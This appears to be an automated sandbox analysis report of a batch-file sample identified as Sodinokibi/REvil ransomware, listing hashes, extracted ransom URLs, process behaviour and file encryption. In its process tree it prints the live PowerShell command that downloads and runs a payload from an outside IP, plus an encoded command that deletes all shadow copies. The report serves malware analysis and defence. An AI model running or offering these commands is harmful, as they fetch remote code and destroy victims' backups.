Analysis
max time kernel: 136s
max time network: 37s
platform: windows7_x64
resource: win7v200430
submitted: 02-06-2020 10:10
Static task: static1
Behavioral task: behavioral1
  Sample: b0d58156fab428d26b46727824eabf37.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: b0d58156fab428d26b46727824eabf37.bat
  Resource: win10v200430
General
Target: b0d58156fab428d26b46727824eabf37.bat
Size: 214B
MD5: 80701ef329f0effbde1182ab9f26be31
SHA1: b948c5f5d1d8d2f7bb793db6ed2119d8143b8084
SHA256: bfecfd11f233e3531ec0241d1186c28fd737e3b476a51e4000312296ab8c0c1c
SHA512: f2a24c2587f2621b2a9d571522a4e0126af41f482d2e942579c199acacb98a4783dd03f06635173f59c6e37c2ad55f8778a7c0841e4848dee533ddf232ce5b9d
Malware Config
Extracted
  http://185.103.242.78/pastes/b0d58156fab428d26b46727824eabf37
Extracted
  C:\70f6a4-readme.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5E2B4ACBB61DFC6D
  http://decryptor.cc/5E2B4ACBB61DFC6D
Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
  pid   process
  1388  powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
Processes:
  description                        pid   process         target process
  PID 828 wrote to memory of 1388    828   cmd.exe         powershell.exe
  PID 1388 wrote to memory of 1776   1388  powershell.exe  powershell.exe
  PID 1388 wrote to memory of 1776   1388  powershell.exe  powershell.exe
  PID 1388 wrote to memory of 1776   1388  powershell.exe  powershell.exe
  PID 1388 wrote to memory of 1776   1388  powershell.exe  powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
  description                      pid   process
  Token: SeDebugPrivilege          1388  powershell.exe
  Token: SeDebugPrivilege          1388  powershell.exe
  Token: SeDebugPrivilege          1776  powershell.exe
  Token: SeBackupPrivilege         1592  vssvc.exe
  Token: SeRestorePrivilege        1592  vssvc.exe
  Token: SeAuditPrivilege          1592  vssvc.exe
  Token: SeTakeOwnershipPrivilege  1388  powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
  description      ioc                                                                                                                                              process
  Set value (str)  \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\758.bmp"  powershell.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: EnumeratesProcesses (77 IoCs)
Processes:
  pid   process
  1388  powershell.exe  (75 entries)
  1776  powershell.exe  (2 entries)
Blacklisted process makes network request (1 IoC)
Processes:
  flow  pid   process
  3     1388  powershell.exe
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes:
  description  ioc                                                                                          process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                     vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                   vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                          vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer     vssvc.exe
Drops file in Program Files directory (20 IoCs)
Processes:
  description                   ioc                                                                                      process
  File created                  \??\c:\program files\70f6a4-readme.txt                                                   powershell.exe
  File opened for modification  \??\c:\program files\UseSet.3g2                                                          powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\70f6a4-readme.txt              powershell.exe
  File opened for modification  \??\c:\program files\RegisterSkip.wmv                                                    powershell.exe
  File opened for modification  \??\c:\program files\UnregisterEnable.au                                                 powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\70f6a4-readme.txt         powershell.exe
  File opened for modification  \??\c:\program files\UninstallGrant.wmv                                                  powershell.exe
  File opened for modification  \??\c:\program files\BlockExpand.vdw                                                     powershell.exe
  File opened for modification  \??\c:\program files\EnterRequest.jpg                                                    powershell.exe
  File opened for modification  \??\c:\program files\JoinExport.css                                                      powershell.exe
  File opened for modification  \??\c:\program files\SelectCompress.search-ms                                            powershell.exe
  File opened for modification  \??\c:\program files\RestartReset.xla                                                    powershell.exe
  File opened for modification  \??\c:\program files\SetEnter.vsx                                                        powershell.exe
  File opened for modification  \??\c:\program files\ShowConnect.vsx                                                     powershell.exe
  File opened for modification  \??\c:\program files\UseCopy.crw                                                         powershell.exe
  File created                  \??\c:\program files (x86)\70f6a4-readme.txt                                             powershell.exe
  File opened for modification  \??\c:\program files\DisableComplete.wvx                                                 powershell.exe
  File opened for modification  \??\c:\program files\GetExport.docx                                                      powershell.exe
  File opened for modification  \??\c:\program files\InvokeApprove.3gp2                                                  powershell.exe
  File created                  \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\70f6a4-readme.txt powershell.exe
Processes

C:\Windows\system32\cmd.exe (depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\b0d58156fab428d26b46727824eabf37.bat"
  - Suspicious use of WriteProcessMemory
  PID: 828

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, child of PID 828)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b0d58156fab428d26b46727824eabf37');Invoke-XXZLMCF;Start-Sleep -s 10000"
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Sets desktop wallpaper using registry
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Drops file in Program Files directory
    PID: 1388

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3, child of PID 1388)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Note: the -e argument is base64-encoded UTF-16LE PowerShell; it decodes to a Get-WmiObject Win32_Shadowcopy pipeline that calls Delete() on every shadow copy, which is what triggers the vssvc.exe activity and its "Modifies service" entries below.
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      PID: 1776

C:\Windows\system32\vssvc.exe (depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service
  PID: 1592